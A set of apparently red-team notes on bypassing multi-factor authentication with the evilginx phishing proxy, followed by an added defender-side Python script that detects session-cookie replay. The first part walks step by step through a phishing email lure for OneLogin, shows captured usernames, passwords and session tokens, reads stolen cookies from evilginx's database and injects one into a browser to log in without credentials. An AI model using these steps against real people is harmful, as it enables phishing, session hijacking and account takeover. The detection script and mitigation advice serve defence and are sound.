MFA BYPASS
Last updated
#example trigger
root@victim:~$ BROWSER > https://mail.google.com
FROM: redteam@gmail.com
SUBJECT: OneLogin - [Instructions] Activate your 30 Day OneLogin Trial
redirect: {evilginx phish URL}
* note: if users have had some email security awareness training, they will be able to identify the malicious URLs when they hover their mouse over the links
- if users aren't aware and click the links, they will be sent to the specified URLs being served by the evilginx server
- evilginx will eventually capture anything the victim enters in the HTML fields to include username/password/tokens
- once everything is captured, evilginx will redirect the user to any specified URLs or site
- it is best to redirect users to the legitimate site!
#MFA Bypass using captured tokens re-use
root@oco:~$ sudo ./evilginx ...
evilginx:
captured data...
[05:46:00] [+++] [0] Username: [{emp@gmail.com},remember_username]
[05:46:10] [+++] [0] Password: [{arbitraryValue}]
[05:46:03] [+++] [0] Detected authorization URL - tokens intercepted: /client/apps
- captured tokens can be re-used to log in to the legitimate site without supplying a username or password
* once the victim user enters their credentials, evilginx will capture the data
- the captured credentials can then be used for account takeover
root@oco:~$ sudo -i
root@oco:~$ ls -la
.evilginx
root@oco:~$ cd .evilginx/
root@oco:~$ ls
blacklist.txt config.yaml crt data.db
root@oco:~$ cat data.db
sub_session_onelogin.com...,Value: eyJ0eXA...
* identified cookies will show up here
- this cookie can be used to bypass login portals
#bypass method by going to the legitimate website
root@oco:~$ BROWSER > https://app.onelogin.com/login > F12 > Application > Storage > Cookies > Session Cookie
Name: {sub_session_onelogin.com}
- enter the cookie name captured in evilginx
Value: {arbitraryValue}
- enter/replace the current cookie value with the one captured in evilginx (if any)
* ignore the login page as that is not necessary for cookie logins
root@oco:~$ BROWSER > https://app.onelogin.com
* remove everything after the host (path and parameters), leaving only the subdomain.domain.tld URL
- the cookie will take care of everything and will automatically log in via the cookie value
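The login portal never sees the replay above; it only sees a valid session cookie. A defender-side check that catches it is to bind each session to the client that authenticated it and flag any request carrying that session from a different client (or from a client with no login at all). This is an added example, not part of these notes or of evilginx; the log format (time|event|session_hash|src_ip|user_agent) and the sample lines are constructed.

```python
"""Detect session-cookie replay: a session id used by a client other than the
one that performed the login for it. Added defender-side example."""
from collections import defaultdict

# Constructed sample log (assumed format): time|event|session_hash|src_ip|user_agent
# Session a1b2c3 is authenticated from one client, then replayed from another.
SAMPLE_LOG = """\
05:46:03|login_ok|a1b2c3|203.0.113.10|Chrome/120
05:46:20|request|a1b2c3|203.0.113.10|Chrome/120
05:52:41|request|a1b2c3|198.51.100.7|Firefox/121
05:53:02|request|a1b2c3|198.51.100.7|Firefox/121
06:01:00|login_ok|d4e5f6|192.0.2.55|Safari/17
06:02:15|request|d4e5f6|192.0.2.55|Safari/17
"""


def parse_log(text):
    """Split pipe-delimited log lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event, sid, ip, ua = line.split("|", 4)
        events.append({"ts": ts, "event": event, "sid": sid, "ip": ip, "ua": ua})
    return events


def find_replayed_sessions(events):
    """Return {session_id: sorted list of (ip, user_agent) clients that sent
    requests with that session without being the client that logged in}.
    A session with no observed login at all is flagged too, which is exactly
    the cookie-injection case: a browser presents a session it never earned."""
    owner = {}                      # sid -> (ip, ua) that completed login_ok
    suspicious = defaultdict(set)
    for e in events:
        client = (e["ip"], e["ua"])
        if e["event"] == "login_ok":
            owner[e["sid"]] = client
        elif e["event"] == "request" and owner.get(e["sid"]) != client:
            suspicious[e["sid"]].add(client)
    return {sid: sorted(clients) for sid, clients in suspicious.items()}


if __name__ == "__main__":
    for sid, clients in find_replayed_sessions(parse_log(SAMPLE_LOG)).items():
        print(f"ALERT session {sid} replayed from {clients}")
```

Source IP alone gives false positives for mobile and VPN users, so pair it with user agent and a short time window and treat the alert as a trigger to revoke the session rather than as proof on its own. Origin-bound authenticators (FIDO2/WebAuthn) remove the replayable secret from the login step, but a stolen post-login cookie still needs this kind of session binding.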